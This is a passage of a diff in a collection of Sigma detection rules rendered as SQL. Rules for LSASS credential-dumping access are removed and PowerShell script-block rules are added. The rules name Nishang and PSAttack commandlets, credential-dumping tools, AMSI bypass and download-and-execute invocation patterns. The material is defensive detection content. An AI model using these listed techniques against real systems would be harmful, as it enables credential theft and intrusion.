'\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", - "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "status": "experimental", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.t1548" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + 
"attack.t1059.001" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + 
"title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' 
ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": 
"proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", - "status": "test", - 
"description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": "91e69562-2426-42ce-a647-711b8152ced6", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.reconnaissance", + "attack.discovery", "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.impact" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.impact", + "attack.t1565" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE 
'%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "status": "test", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' 
OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR 
(SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "test", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE 